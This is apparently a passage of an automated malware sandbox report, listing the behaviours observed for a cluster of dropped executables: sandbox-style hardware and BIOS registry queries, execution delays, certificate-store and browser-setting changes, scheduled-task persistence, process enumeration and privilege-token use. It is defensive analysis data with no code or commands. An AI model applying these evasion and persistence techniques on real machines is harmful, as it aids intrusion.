Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\mjhhg\ocqhk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109460101\cf6ef5812d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\ProgramData\mjhhg\ocqhk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
